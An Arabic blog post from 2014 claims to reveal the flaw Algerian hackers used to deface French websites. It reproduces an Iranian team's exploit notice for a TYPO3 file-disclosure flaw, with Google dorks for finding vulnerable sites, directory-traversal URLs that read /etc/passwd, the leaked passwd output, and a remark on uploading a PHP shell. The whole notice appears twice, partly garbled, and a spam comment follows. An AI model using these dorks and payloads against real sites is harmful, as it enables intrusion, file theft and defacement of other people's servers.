الثلاثاء، 28 يناير 2014
حصريا الثغرة التي استخدمها الهكر الجزائريون في اختراق المواقع الغربية
مثلما رأينا انه في الفاتح نوفمبر قام مجموعة من الهاكر الجزائريون بالاطاحة بمئات المواقع الفرنسية
وبعد بحث تمت معرفة الثغرة التي استعملت في اختراق معظم هذه المواقع وليست كلها الى جانب ان هناك بعظ الهاكر الذين يفظلون عدم البوح بأسرارهم
لكن لا يأس مع المعرفة وسنكتشف الطرق الاخرى
هذه هي الثغرة
وهذا مثال على الثغرة
###########################
# Exploit Title : Typo3 File Disclosure
# Exploit Author : Iran Security Team
# Discovered By : Red.Eagle
# Home : WWW.IrSecTeam.org
# Dork1 : inurl:fileadmin/php/commun/download.php
# Dork2 : inurl:fileadmin/scripts/download.php
# Date: 2013 1 November
# Tested on:windows 7
# Software Link: http://typo3.org/
#Contact To Me: https://www.facebook.com###########################
#
# Exmple :http://127.0.0.1/fileadmin/php/commu...2Fetc%2Fpasswd
#
# Exmple :http://127.0.0.1/fileadmin/scripts/d...2Fetc%2Fpasswd
#
# Exmple :http://127.0.0.1/fileadmin/php/downl...2Fetc%2Fpasswd
#
# Sp Tnx To : Special Tnx To : Det3cT0r - GoldHat - Mr.Rahgozar - Mehran BBC - Game Over - Z3ro C00l - Retn0Hack -
Saeed0511 - Ir.Soldier - Red.Eagle - Alimp5 - Arshia Mahkom -Poya21 - Exploit Black - Hot0n - 4m!r - Hasani_farhad -
InJecTable - Mosi.Pro - Kandgi_Boy And All Members Of Iran Security Team
#
#
###########################
عند تطبيق الإستغلال:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0
perator:/root:/bin/bash
man:x:13:15:man:/usr/man:/bin/false
postmaster:x:14:12
ostmaster:/var/spool/mail:/bin/false
cron:x:16:16:cron:/var/spool/cron:/bin/false
ftp:x:21:21::/home/ftp:/bin/false
sshd:x:22:22:sshd:/dev/null:/bin/false
at:x:25:25:at:/var/spool/cron/atjobs:/bin/false
squid:x:31:31:Squid:/var/cache/squid:/bin/false
gdm:x:32:32:GDM:/var/lib/gdm:/bin/false
xfs:x:33:33:X Font Server:/etc/X11/fs:/bin/false
games:x:35:35:games:/usr/games:/bin/false
named:x:40:40:bind:/var/bind:/bin/false
postgres:x:70:70::/var/lib/postgresql:/bin/bash
nut:x:84:84:nut:/var/state/nut:/bin/false
cyrus:x:85:12::/usr/cyrus:/bin/false
vpopmail:x:89:89::/var/vpopmail:/bin/false
postfix:x:207:207ostfix:/var/spool/postfix:/bin/false
smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false
portage:x:250:250ortage:/var/tmp/portage:/bin/false
guest:x:405:100:guest:/dev/null:/dev/null
nobody:x:99:99:nobody:/:
domainfactory:x:502:502::/home/domainfactory:/bin/bash
domcgi:x:520:520::/home/domcgi:/bin/bash
sshd:!!:59968:532:sshd privsep:/var/empty:/bin/false
mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
ldap:x:439:439:added by portage for openldap:/usr/lib/openldap:/sbin/nologin
وتستطيع أن ترفع الشل بتعويض ملف etc/passwd برابط php shell
###########################
# Exploit Title : Typo3 File Disclosure
# Exploit Author : Iran Security Team
# Discovered By : Red.Eagle
# Home : WWW.IrSecTeam.org
# Dork1 : inurl:fileadmin/php/commun/download.php
# Dork2 : inurl:fileadmin/scripts/download.php
# Date: 2013 1 November
# Tested on:windows 7
# Software Link: http://typo3.org/
#Contact To Me: https://www.facebook.com###########################
#
# Exmple :http://127.0.0.1/fileadmin/php/commu...2Fetc%2Fpasswd
#
# Exmple :http://127.0.0.1/fileadmin/scripts/d...2Fetc%2Fpasswd
#
# Exmple :http://127.0.0.1/fileadmin/php/downl...2Fetc%2Fpasswd
#
# Sp Tnx To : Special Tnx To : Det3cT0r - GoldHat - Mr.Rahgozar - Mehran BBC - Game Over - Z3ro C00l - Retn0Hack -
Saeed0511 - Ir.Soldier - Red.Eagle - Alimp5 - Arshia Mahkom -Poya21 - Exploit Black - Hot0n - 4m!r - Hasani_farhad -
InJecTable - Mosi.Pro - Kandgi_Boy And All Members Of Iran Security Team
#
#
###########################
عند تطبيق الإستغلال:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0
perator:/root:/bin/bashman:x:13:15:man:/usr/man:/bin/false
postmaster:x:14:12
ostmaster:/var/spool/mail:/bin/falsecron:x:16:16:cron:/var/spool/cron:/bin/false
ftp:x:21:21::/home/ftp:/bin/false
sshd:x:22:22:sshd:/dev/null:/bin/false
at:x:25:25:at:/var/spool/cron/atjobs:/bin/false
squid:x:31:31:Squid:/var/cache/squid:/bin/false
gdm:x:32:32:GDM:/var/lib/gdm:/bin/false
xfs:x:33:33:X Font Server:/etc/X11/fs:/bin/false
games:x:35:35:games:/usr/games:/bin/false
named:x:40:40:bind:/var/bind:/bin/false
postgres:x:70:70::/var/lib/postgresql:/bin/bash
nut:x:84:84:nut:/var/state/nut:/bin/false
cyrus:x:85:12::/usr/cyrus:/bin/false
vpopmail:x:89:89::/var/vpopmail:/bin/false
postfix:x:207:207
ostfix:/var/spool/postfix:/bin/falsesmmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false
portage:x:250:250
ortage:/var/tmp/portage:/bin/falseguest:x:405:100:guest:/dev/null:/dev/null
nobody:x:99:99:nobody:/:
domainfactory:x:502:502::/home/domainfactory:/bin/bash
domcgi:x:520:520::/home/domcgi:/bin/bash
sshd:!!:59968:532:sshd privsep:/var/empty:/bin/false
mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
ldap:x:439:439:added by portage for openldap:/usr/lib/openldap:/sbin/nologin
وتستطيع أن ترفع الشل بتعويض ملف etc/passwd برابط php shell
1 التعليقات:
متخصص شو خوبه حتما سر بزنید
إرسال تعليق